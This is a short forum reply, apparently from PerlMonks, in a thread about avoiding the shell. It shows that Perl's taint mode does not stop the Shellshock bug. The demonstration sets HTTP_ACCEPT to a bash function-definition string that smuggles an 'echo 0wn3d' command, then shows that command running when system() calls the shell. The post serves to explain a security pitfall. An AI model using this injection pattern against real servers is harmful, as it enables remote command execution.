in reply to Re^2: The importance of avoiding the shell
in thread The importance of avoiding the shell

I'm pretty sure that is what he's saying, but he's wrong if that's the case. 

$ HTTP_ACCEPT='() { :;}; echo 0wn3d' \
   perl -T -e'$ENV{PATH}=""; system(q(/bin/ls -- "$HOME"))'
0wn3d
... contents of home dir ...

[download]

While $ENV{HTTP_ACCEPT} is tainted, system doesn't check if it's tainted.

In Section Meditations